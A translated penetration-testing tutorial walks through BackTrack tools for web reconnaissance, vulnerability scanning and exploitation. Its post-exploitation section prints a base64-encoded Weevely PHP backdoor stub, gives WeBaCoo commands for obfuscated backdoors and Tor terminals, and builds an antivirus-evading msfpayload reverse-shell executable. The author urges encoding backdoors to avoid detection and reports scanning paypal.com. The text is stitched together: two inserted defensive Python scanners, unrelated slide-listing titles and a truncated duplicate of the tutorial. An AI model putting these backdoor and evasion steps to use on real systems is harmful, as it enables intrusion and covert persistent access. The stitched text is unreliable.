Computer Security

Written by
Caleb Bucker
Pen-Tester – Ethical Hacker – Security Researcher

http://calebbucker.blogspot.com/
http://www.twitter.com/CalebDrugs
https://www.facebook.com/caleb.bucker
mailto:calebbucker@gmail.com

The original copy, in Spanish:
http://www.sendspace.com/file/gyljvj

PENETRATION TESTING
Web Analysis - Vulnerability Assessment - Exploitation
Translated by
Mohamed Abdel Azim Mohamed

Index

•   INTRODUCTION

•   METHODS OF ANALYSIS OF WEB APPLICATIONS

    1. NETWORK MAPPING
    •   Nmap
    •   Netifera

    2. INFORMATION GATHERING
    •   TheHarvester
    •   Maltego

    3. CMS IDENTIFICATION
    •   BlindElephant
    •   CMS-Explorer
    •   WhatWeb

    4. IDS/IPS DETECTION
    •   Waffit

    5. OPEN SOURCE ANALYSIS
    •   GHDB (Google Hacking DataBase)
    •   Xssed

    6. WEB CRAWLERS
    •   WebShag
    •   DirBuster

    7. VULNERABILITY ASSESSMENT AND EXPLOITATION
    •   JoomScan
    •   SqlMap
    •   Fimap
    •   Shodan
    •   W3af
    •   Uniscan
    •   Nikto

    8. MAINTAINING ACCESS
    •   Weevely
    •   WeBaCoo
    •   MsfPayload

    9. CONCLUSION

INTRODUCTION

Today, as many of us pen-testers know, the analysis of web applications plays a very important role in
a security evaluation and/or penetration test, because it gives us the relevant information about the
web application, such as which plugins it uses and which CMS it runs (Joomla, WordPress or another).

This helps us determine which exploit we should use, or see exactly how to exploit the vulnerabilities
that turn up while performing the penetration test.

Penetration tests are also used to determine the security level of a computer, a LAN (Local Area
Network) or WLAN (Wireless Local Area Network), web applications and other systems, by simulating
the same attacks a Black Hat hacker or cracker would carry out, but without compromising the
information or the availability of services. This is done to identify the potential threats to IT systems
before an attacker (external or internal) discovers them. This process is also known as Ethical Hacking.

To carry out the penetration test described here, BackTrack 5 R3 is used: a Linux distribution based on
Ubuntu, built specifically for these tests, since it ships with a set of very important tools that do much
of the work of obtaining the necessary information about web applications, among other things.

BackTrack Wiki:
http://www.backtrack-linux.org/wiki/
Download:
http://www.backtrack-linux.org/downloads/

METHODS OF ANALYSIS OF WEB APPLICATIONS:

1. NETWORK MAPPING:
    Network mapping is the study of the physical connectivity of a network; Internet mapping is the study
    of the physical connectivity of the Internet. Network mapping is often used to determine the servers
    and operating systems running on a network. The law and ethics of port scanning are complex: a scan
    of a network can be detected by people or by automated systems, and is commonly treated as a
    malicious act.

    The BackTrack suite includes Nmap, a tool we all know for its power and effectiveness at its job, and
    which is very useful for carrying out this important step of a web audit.

    •   NMAP:
        Nmap ("Network Mapper") is an open source tool for network exploration and security auditing.
        Nmap uses raw IP packets in novel ways to determine what hosts are available on a network, what
        services (application name and version) those hosts offer, what operating systems (and versions)
        they run, what type of packet filters or firewalls are in use, and dozens of other characteristics.

        Use:
        nmap www.sitio-web.com
        nmap 192.168.1.1

    •   NETIFERA:
        Netifera is a network scanner that can perform passive analysis (reading a pcap file or sniffing the
        network live) and active analysis (port scanning of the entity). It identifies the hosts on the network.
        The project offers many advantages to security developers and researchers who want to implement
        new tools, as well as to the community of users of those tools.
        This tool is included in BackTrack and is found at the following location:

        Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts -
        Netifera

        Usage is very easy: enter the web address in the field that says "Type Address", press Enter, and the
        target website and the IPs to be audited are listed.

        In this case I entered the website www.paypal.com, on which I ran Reverse Lookup, TCP Connect
        Scan, UDP Scan, Crawler, NS Lookup and Brute Force Host Name.

2. INFORMATION GATHERING

    The first phase of a security assessment focuses on gathering as much information as possible about
    the web application. Information gathering is the most critical step of a web application security test.
    This task can be accomplished in many different ways: using public tools (search engines), scanners,
    simple HTTP requests or specially crafted requests, it is possible to force the application to leak
    information, for example through error messages that disclose the versions and technologies used.

    There are basically two types of information gathering: active and passive. In passive information
    gathering the attacker does not communicate directly with the target and tries to gather information
    that is already available on the Internet, while in active information gathering the attacker is in direct
    contact with the target while collecting information.

    •   THEHARVESTER:

        theHarvester is a tool for collecting e-mail accounts, user names, host names and subdomains from
        different public sources such as search engines and PGP key servers.

        Use:
        /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google
        /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp
        /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin




    •   MALTEGO:
        Maltego is an application for information gathering and forensics that shows how pieces of
        information are connected to each other. With Maltego we can find the relationships people
        commonly have today, including their social profiles (Facebook, Twitter), mutual friends, the
        companies related to the information gathered, and websites. If we collect information about an
        infrastructure, we can map the relationships between domains and DNS names.

        Location:
        Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis - Maltego

        (Figure: Architecture of Maltego)

        (Figure: Example)

3. CMS IDENTIFICATION

    •   BLINDELEPHANT:
        BlindElephant is a Python-based tool used for web application fingerprinting. It is fast, uses little
        bandwidth and is highly automated.
        Use:
        /pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms

    •   CMS-EXPLORER:
        It also serves to fingerprint web applications and can be used to identify the type of CMS in use,
        so that the attack is chosen according to the information obtained.
        Use:
        /pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms

    •   WHATWEB:
        Another tool used to identify the type of content management system (CMS), blogging platform,
        statistics packages, JavaScript libraries and web servers in use. It has 900 plugins for web analysis
        purposes.
        Use:
        /pentest/enumeration/web/whatweb# ./whatweb http://sitio-web.com/
        /pentest/enumeration/web/whatweb# ./whatweb -v http://sitio-web.com/
        /pentest/enumeration/web/whatweb# ./whatweb -a 3 http://sitio-web.com/
        /pentest/enumeration/web/whatweb# ./whatweb 192.168.1.1/24




4. IDS/IPS DETECTION

    While performing a VA/PT on a domain, there is the possibility that IDS/IPS services are installed,
    and these can sometimes stop several types of attacks made against the domain.
    Many WAFs (Web Application Firewalls) are sold to companies as a successful technique for
    mitigating vulnerabilities in web applications.

    Fortunately, a WAF is easy to detect, because most of them use signature-based detection methods;
    as a consequence, an attacker can try to encode the parameters of an attack and attempt to bypass the
    WAF.

    The BackTrack suite includes a useful tool for detecting IDS/IPS: Waffit.

    •   WAFFIT:
        It is a tool that detects the firewall a web server may have in front of it. It is of no small use, since
        detecting the firewall behind the domain is a very important step in the penetration testing
        process.
        Use:
        /pentest/web/waffit# ./wafw00f.py http://sitio-web.com/

5. OPEN SOURCE ANALYSIS
    Open-source analysis is performed with tools like GHDB, revhosts and XSSed. GHDB (Google
    Hacking Database) and XSSed are websites, while revhosts is a console tool.

    •   GHDB:
        The Google Hacking Database, maintained by the Exploit-DB team, is a database of Google dorks
        that can help a pen-tester greatly during information gathering. We can use the dorks to find
        certain types of vulnerable servers or other information.

        For example, a Google dork like "Microsoft-IIS/6.0" intitle:index.of can be used to find servers
        running Microsoft IIS 6.0.

    •   XSSED:
        http://www.xssed.com/ is a website that holds a list of websites vulnerable to Cross-Site Scripting
        (XSS), submitted by various authors.

        It can be opened from: Applications - Backtrack - Information Gathering - Web Application
        Analysis - Open Source Analysis - Xssed.

6. WEB CRAWLERS

    In this last category of web analysis the well-known crawlers are used; they help a great deal in
    listing the "hidden" files and folders inside a web server.

    The BackTrack suite has many tools for this type of analysis, such as DIRB, Golismero, SQLScan,
    Deblaze and WebShag.

    •   WEBSHAG:
        Webshag is a tool written in Python that combines features useful for auditing web servers, such
        as web crawling, URL scanning and file fuzzing.
        Webshag can be used to analyze a web server over HTTP or HTTPS, through a proxy, and using
        HTTP authentication (Basic and Digest).
        It also proposes innovative IDS evasion features, intended to make the correlation of requests
        harder (for example, by using a random proxy for each HTTP request).

        It can be opened from Applications - BackTrack - Information Gathering - Web Application
        Analysis - Web Crawlers - WebShag Gui.

    •   DIRBUSTER:

        DirBuster is a Java application designed to brute-force the directories and files of a web server or
        application. It is often the case that what looks like a web server in a default installation state is
        actually not, and has pages and applications hidden inside it; DirBuster tries to find these.

        DirBuster comes with a total of 9 different wordlists, which makes it extremely effective at finding
        hidden files and directories. And if that were not enough, DirBuster also has the option of doing
        pure brute force.

        It can be found at the following location: Applications - BackTrack - Vulnerability Assessment -
        Web Application Assessment - Web Application Fuzzers - DirBuster

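From the defender's side, a wordlist-driven crawl like the ones described above leaves a very recognisable trace: one source address producing a burst of 404s in a short window. The following detector over Apache "combined" log lines is an added example, not code from the original document or from any of the tools it describes; the log lines and the user-agent strings in it are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format. The user-agent is captured only for the
# report: a scanner can send any UA it likes, so the verdict never relies on it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format access log line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "path": m["path"],
        "status": int(m["status"]),
        "ua": m["ua"],
    }


def detect_dir_bruteforce(lines, window_seconds=60, min_misses=15, min_miss_ratio=0.8):
    """Flag source IPs that pile up 404s inside a sliding time window.

    A directory brute-forcer guesses paths from a wordlist, so nearly every
    request misses; a real visitor produces a few 404s (a missing favicon,
    a stale link) among many 200s. Returns {ip: details} for flagged sources.
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        window = deque()
        for rec in recs:
            window.append(rec)
            # drop requests that have fallen out of the time window
            while rec["ts"] - window[0]["ts"] > timedelta(seconds=window_seconds):
                window.popleft()
            misses = [w for w in window if w["status"] == 404]
            if len(misses) >= min_misses and len(misses) / len(window) >= min_miss_ratio:
                alerts[ip] = {
                    "misses": len(misses),
                    "requests": len(window),
                    "first_seen": window[0]["ts"].isoformat(),
                    "user_agents": sorted({w["ua"] for w in window}),
                    "sample_paths": sorted(w["path"] for w in misses)[:5],
                }
                break  # one alert per source is enough
    return alerts


def build_sample_log():
    """Constructed sample log: one host walking a wordlist (almost all 404s)
    and one ordinary visitor browsing a handful of real pages. Not real traffic."""
    start = datetime(2013, 3, 10, 12, 0, 0, tzinfo=timezone.utc)

    def stamp(offset):
        return (start + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S +0000")

    probes = ["/admin/", "/backup/", "/old/", "/test/", "/tmp/", "/.svn/entries",
              "/phpmyadmin/", "/config.php.bak", "/uploads/", "/dev/", "/staging/",
              "/db/", "/logs/", "/private/", "/cgi-bin/", "/include/", "/.git/HEAD",
              "/install/", "/setup/", "/wp-admin/"]
    lines = []
    for i, path in enumerate(probes):
        status = 200 if path == "/admin/" else 404  # the scanner finds one real directory
        lines.append(f'203.0.113.7 - - [{stamp(i)}] "GET {path} HTTP/1.1" {status} 0 '
                     f'"-" "DirBuster-1.0-RC1 (constructed UA)"')
    for i, path in enumerate(["/", "/index.php", "/about.php", "/missing.css", "/contact.php"]):
        status = 404 if path.endswith(".css") else 200
        lines.append(f'198.51.100.20 - - [{stamp(7 * i)}] "GET {path} HTTP/1.1" {status} 1024 '
                     f'"-" "Mozilla/5.0 (constructed UA)"')
    return lines


if __name__ == "__main__":
    for ip, info in detect_dir_bruteforce(build_sample_log()).items():
        print(f"{ip}: {info['misses']}/{info['requests']} requests in the window were 404s, "
              f"e.g. {info['sample_paths']}")
```
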
7. VULNERABILITY ASSESSMENT AND EXPLOITATION

    The vulnerability assessment stage is where we can probe our target for flaws, but before a
    vulnerability assessment, the information gathered about the target is what makes it useful.
    The information gathering phase remains the key step before any further attack, simply because it
    makes the job easier; for example, in the earlier stage a CMS identification scanner such as
    BlindElephant was run and found the version of the installed application.
    Now, in the vulnerability assessment stage, many tools (scanners) can be used that help a great deal
    in finding vulnerabilities in the specific web server.

    •   JOOMSCAN:
        It is a Perl-based tool used to identify known vulnerabilities such as SQL injection, XSS and
        others on web servers running the Joomla platform.
        • Detects the version of Joomla! that is running.
        • Scans for and locates known vulnerabilities in Joomla! and its extensions.
        • Reports in text or HTML format.
        • Allows immediate updating of the scanner, also via svn.
        • Detects vulnerability types: SQL injection, LFI, RFI, XSS and others.

        It can be run with:
        /pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com




    •   SQLMAP:

        It is a tool that automates the process of detecting and exploiting SQL injection vulnerabilities,
        giving full access to the database behind the web server.
        It can be run with:
        /pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs

    •   FIMAP:
        It is a small tool written in Python that can find, prepare, audit and automatically exploit Remote
        File Inclusion bugs in web applications. It is still under development, but usable. Fimap's
        objective is to improve the quality and security of your website.
        It can be run with (the URL is quoted so the shell does not interpret the "&"):
        /pentest/web/fimap# ./fimap.py -u 'http://localhost/test.php?file=bang&id=23'
        /pentest/web/fimap# ./fimap.py -g -q 'noticias.php?id='

    •   SHODAN:
        This is another site assessment tool, of particular use to pen-testers. It can be used to gather a
        range of intelligence about devices connected to the Internet.
        We can, for example, check whether network devices such as routers, VoIP equipment, printers,
        cameras and so on are exposed. To find out whether a service is running on a domain, the syntax
        would be:
        • hostname:target.com port:80,21,22
        If we simply want the results for a host name, the syntax would be:
        • hostname:target.com




    •   W3AF:

        w3af is a web application security audit tool, basically divided into several modules such as
        Attack, Audit, Exploit, Discovery, Brute Force and Evasion, all of which can be used as needed.
        These modules come with several sub-modules; for example, we can select the XSS audit module
        when that particular audit is required.

        It can be opened from
        Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web
        Vulnerability Scanners - w3af
        Once the analysis is complete, w3af shows detailed information about the vulnerabilities found in
        the specified website, which can then be exploited accordingly.

    •   UNISCAN:
        A web vulnerability scanner oriented to computer security, aimed at finding vulnerabilities in web
        systems. It is licensed under the GNU General Public License 3.0 (GPL 3).
        Uniscan is developed in Perl, has easy handling of regular expressions and is also multi-threaded.

        Features:
        • Identification of system pages via a web crawler.
        • Testing of the pages found via the GET method.
        • Testing of the forms found via the POST method.
        • Support for SSL requests (HTTPS).
        • Proxy support.
        • Generates a list of sites via Google.
        • Generates a list of sites via Bing.
        • Client GUI written with Perl Tk.
        It can be downloaded from the following link:
        http://uniscan.sourceforge.net/?page_id=7

        Use:
        ./uniscan.pl -u http://www.sitio-web.com/ -qweds




    •   NIKTO:
        It is a web server scanner that performs comprehensive tests against web servers for multiple
        items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over
        1250 servers, and version-specific problems on over 270 servers. It also checks server
        configuration items, such as the presence of multiple index files and the HTTP server options.

        Nikto is a robust project that has been in development for several years and is constantly
        evolving. Some of the most interesting features of this tool include the ability to generate reports
        in various formats, integration with LibWhisker (anti-IDS) and integration with Metasploit, among
        others.

        It can be opened from
        Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web
        Vulnerability Scanners - Nikto

        Use:
        /pentest/web/nikto# ./nikto.pl -host www.sitio-web.com




8. MAINTAINING ACCESS

    Once we have access to the website (the target), we need to maintain that access for future use, so
    that we do not start from scratch again and again. To do so, we can upload a web shell or a backdoor
    to the web page. The encoding of the backdoor is also important, so that it does not create "noise"
    when uploaded to the server; otherwise administrators can easily detect and remove the backdoor.
    The BackTrack 5 R3 suite incorporates good tools for carrying out this process, which are:

    •   WEEVELY:
        It is an essential tool for the post-exploitation of web applications, and can be used as a backdoor
        or a web shell to manage web accounts. Weevely looks for functions like system(), passthru(),
        popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system() and python_eval()
        among the functions enabled on the remote server. The following code is an example of the
        backdoor code created by Weevely.

        -------------------------------------------------------------------------------------------------------------------
        eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk
        YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv
        c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK
        GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30='));
        -------------------------------------------------------------------------------------------------------------------
        It can be opened from Applications - BackTrack - Maintaining Access - Web BackDoors -
        Weevely

        Use:
        /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php
        /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password
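The stub above shows what an administrator actually has to find on disk: a one-line eval() around a base64 blob, with the real logic (request-controlled input feeding another eval) only visible after decoding. The following scanner is an added example from the defender's side, not code from the original document or from Weevely: it peels eval(base64_decode('...')) layers, then reports the dangerous PHP functions (the list the text gives for Weevely, plus eval/assert) and request-controlled inputs found at any layer. The sample PHP files are constructed; the first mirrors the structure of the stub above.

```python
import base64
import re
import textwrap

# PHP functions the Weevely description above lists as the ones it probes for;
# eval() and assert() are added because they also execute attacker-supplied code.
DANGEROUS_FUNCS = ("system", "passthru", "popen", "exec", "proc_open",
                   "shell_exec", "pcntl_exec", "eval", "assert")

# eval(base64_decode('...')) where the base64 may be wrapped across several
# lines, which is exactly the shape of the stub shown above.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
# Request-controlled inputs a backdoor reads its commands from.
INPUT_SOURCES = re.compile(
    r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\s*\[\s*['\"]([^'\"]+)['\"]\s*\]")
FUNC_CALL = re.compile(r"\b(" + "|".join(DANGEROUS_FUNCS) + r")\s*\(", re.IGNORECASE)


def decode_layers(php_source, max_depth=5):
    """Peel eval(base64_decode('...')) wrappers and return each decoded layer."""
    layers = []
    current = php_source
    for _ in range(max_depth):
        m = EVAL_B64.search(current)
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group(1))  # re-join a line-wrapped blob
        try:
            current = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64: stop, keep the layers already peeled
            break
        layers.append(current)
    return layers


def analyze_php(php_source):
    """Report encoding layers, dangerous calls and request inputs found in one PHP file."""
    layers = decode_layers(php_source)
    texts = [php_source] + layers
    funcs = sorted({f.lower() for t in texts for f in FUNC_CALL.findall(t)})
    inputs = sorted({s for t in texts for s in INPUT_SOURCES.findall(t)})
    # An encoded eval() is suspicious by itself; otherwise require both a
    # dangerous function and a request-controlled input in the same file.
    suspicious = bool(layers) or (bool(funcs) and bool(inputs))
    return {
        "encoded_layers": len(layers),
        "dangerous_functions": funcs,
        "request_inputs": inputs,
        "verdict": "suspicious" if suspicious else "clean",
    }


def scan_files(files):
    """files: {path: source}. Returns the paths whose verdict is 'suspicious'."""
    return sorted(p for p, src in files.items() if analyze_php(src)["verdict"] == "suspicious")


# Constructed samples (not files taken from any real server). The first has the
# structure of the Weevely stub above: the logic sits inside a base64 blob that
# is wrapped over several lines, as it would be in the dropped file.
_INNER = "parse_str($_SERVER['HTTP_REFERER'],$a); eval(base64_decode(join($a)));"
_BLOB = base64.b64encode(_INNER.encode()).decode()
SAMPLE_BACKDOOR = ("<?php\neval(base64_decode('"
                   + "\n    ".join(textwrap.wrap(_BLOB, 60)) + "'));\n")
# A legitimate base64_decode on database data: no eval, no request-controlled input.
SAMPLE_CLEAN = ("<?php\n$img = base64_decode($row['thumbnail']);\n"
                "header('Content-Type: image/png');\necho $img;\n")


if __name__ == "__main__":
    for name, src in (("backdoor.php", SAMPLE_BACKDOOR), ("thumb.php", SAMPLE_CLEAN)):
        print(name, analyze_php(src))
```
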




    •   WEBACOO:
        WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP
        between the client and the web server. It is a post-exploitation tool for maintaining access to a
        (compromised) web server. It was designed to operate under the radar of modern, up-to-date AV,
        NIDS, IPS, network firewalls and application firewalls, providing a stealthy mechanism to execute
        commands on the compromised server. The obfuscated file performs its communication through
        the HTTP Cookie header, validating the HTTP requests and responses exchanged with the web
        server. WeBaCoo provides a way to generate the code of the PHP backdoor using predefined
        payloads. It also offers a "terminal" mode in which the user can establish a remote connection to
        the server and execute commands with the privileges of the web service.

        The download is available from GitHub:
        https://github.com/anestisb/WeBaCoo

        Options:
        1) Create the obfuscated backdoor 'backdoor.php' with the default settings:
        ./webacoo.pl -g -o backdoor.php

        2) Create the unobfuscated backdoor 'raw-backdoor.php' using function 4 (passthru):
        ./webacoo.pl -g -o raw-backdoor.php -f 4 -r

        3) Establish a "terminal" connection to the remote host with the default settings:
        ./webacoo.pl -t -u http://127.0.0.1/backdoor.php

        4) Establish a "terminal" connection to the remote host, configuring some arguments:
        ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TTT"

        5) Establish a "terminal" connection to the remote host through an HTTP proxy:
        ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

        6) Establish a "terminal" connection to the remote host through an HTTP proxy with basic
        authentication:
        ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

        7) Establish a "terminal" connection to the remote host via Tor and log the activity:
        ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt





    •   MSFPAYLOAD:
        Metasploit can be used to create backdoors that can then be used to maintain access to the web
        server. This is done with the help of msfpayload. The steps to create a backdoor with msfpayload
        are as follows. First we select the payload we will use to get a Meterpreter shell through a reverse
        TCP connection; the command would be:
        msfpayload windows/meterpreter/reverse_tcp

        This payload has two parameters: LHOST (our IP) and LPORT, to select the port we will use. The
        "R" outputs the payload in raw format so that we can then encode it:
        msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R

        This command creates the payload, but it has to be encoded to avoid antivirus detection; that can
        be done with msfencode, piping ("|") the raw output into it:
        msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t exe > bucker.exe

        -e specifies the encoder to use, in this case shikata_ga_nai, and -t the type of output file (exe).
        If we want to see the list of encoders available in MSF, we use the following command:

        msfencode -l

9. CONCLUSION

    These are only a few of the methods you can follow to exploit vulnerabilities in a web application.

    Once we have the information about our target, we try to perform a vulnerability assessment in order
    to learn which exploits can be used.

    Once that is done, we exploit the vulnerabilities and, if necessary, upload a backdoor; but before that,
    the backdoor must be encoded to avoid detection.

    I hope this helps you with finding vulnerabilities, exploiting them and maintaining access to your
    target.

Greetings.




Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 

Computer security

• 2. Index

• INTRODUCTION
• METHODS OF ANALYSIS OF WEB APPLICATIONS
  1. NETWORK MAPPING
  • Nmap
  • Netifera
  2. INFORMATION GATHERING
  • TheHarvester
  • Maltego
  3. CMS IDENTIFICATION
  • BlindElephant
  • CMS-Explorer
  • WhatWeb
  4. IDS/IPS DETECTION
  • Waffit
  5. OPEN SOURCE ANALYSIS
  • GHDB (Google Hacking DataBase)
  • Xssed
  6. WEB CRAWLERS
  • WebShag
  • DirBuster
  7. VULNERABILITY ASSESSMENT AND EXPLOITATION
  • JoomScan
  • SqlMap
  • Fimap
  • Shodan
  • W3af
  • Uniscan
  • Nikto
  8. MAINTAINING ACCESS
  • Weevely
  • WeBaCoo
  • MsfPayload
  9. CONCLUSION
• 3. INTRODUCTION

Today, as most of us pen-testers know, the analysis of web applications plays a very important role in a security evaluation and/or penetration test, because it gives us the relevant information about the web application: the plugins it uses, the kind of CMS (Joomla, WordPress or other), and so on. This helps us determine which exploit to use, or exactly how to exploit the vulnerabilities that can appear while performing the penetration test.

Penetration testing is also used to determine the security level of a computer, a LAN (Local Area Network) or WLAN (Wireless Local Area Network), web applications and other systems, using simulated attacks identical to those a Black Hat Hacker or Cracker would carry out, but without compromising the information or the availability of services. This is done in order to identify the potential threats to IT systems before an attacker (external or internal) discovers them. This process is also known as Ethical Hacking.

To carry out this penetration testing procedure, BackTrack 5 R3 is used, a Linux distro based on Ubuntu that is well suited to these tests, as it comes with a set of very important tools that do much of the work of gathering all the necessary information about web applications, among other things.

BackTrack Wiki: http://www.backtrack-linux.org/wiki/
Download: http://www.backtrack-linux.org/downloads/
• 4. METHODS OF ANALYSIS OF WEB APPLICATIONS:

1. NETWORK MAPPING:

Network Mapping is the study of the physical connectivity of a network; Internet Mapping is the study of the physical connectivity of the Internet. Network mapping is often used to determine the servers and operating systems running on the network. The law and ethics of port scanning are complex: a scan of a network can be detected by humans or by automated systems, and may be treated as a malicious act. The BackTrack suite includes Nmap, a tool we all know for its power and effectiveness, which is very useful for carrying out this important step of a web audit.

• NMAP: Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on a network, what services (application name and version) they offer, what operating systems (and versions) they run, what type of packet filters or firewalls are in use, and dozens of other characteristics.

Use:
    nmap www.sitio-web.com
    nmap 192.168.1.1
• 5. NETIFERA: Netifera is a network scanner that can perform passive analysis (analysing a pcap file, live network sniffing) and active analysis (port scanning of an entity). It identifies the hosts on the network. The project offers many advantages for security developers and researchers who want to implement new tools, as well as for the community of users of those tools. The tool is included in BackTrack and is located at: Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts - Netifera

Usage is very easy: just enter the web address where it says "Type Address", press Enter, and the target website and the IPs to be audited are listed. In this case I placed the website www.paypal.com, on which I performed Reverse Lookup, TCP Connect Scan, UDP Scan, Crawler, NS Lookup and Brute Force Host Name.
• 6. 2. INFORMATION GATHERING

The first phase of a security assessment focuses on gathering as much information as possible about the web application. Information gathering is the most critical step of a web application security test. The task can be accomplished in many different ways: using public tools (search engines, scanners) or sending simple or specially crafted HTTP requests, it is possible to force the application to leak information, for example through error messages or disclosure of the versions and technologies in use. There are basically two types of information gathering, active and passive. In passive information gathering the attacker does not communicate directly with the target and tries to collect information that is available on the Internet, while in active information gathering the attacker is in direct contact with the target while collecting information.

• THEHARVESTER: TheHarvester is a tool to collect email accounts, user names and host names or subdomains from different public sources such as search engines and PGP key servers.

Use:
    /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google
    /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp
    /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin

• MALTEGO: Maltego is an information-gathering and forensic application that shows how pieces of information are connected to each other. With Maltego we can find the relationships that people commonly use today, including their social profiles (Facebook - Twitter), mutual friends, companies related to the gathered information, and websites. If we collect information about an infrastructure, we can map the relationships between domains and DNS names.

Location: Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis - Maltego
• 8. 3. CMS IDENTIFICATION

• BLINDELEPHANT: BlindElephant is a Python-based tool used for web application fingerprinting. The tool is fast, uses little bandwidth and is highly automated.

Use:
    /pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms

• CMS-EXPLORER: It serves to fingerprint web applications and can be used to identify the type of CMS in use, so that the attack can be planned according to the information obtained.

Use:
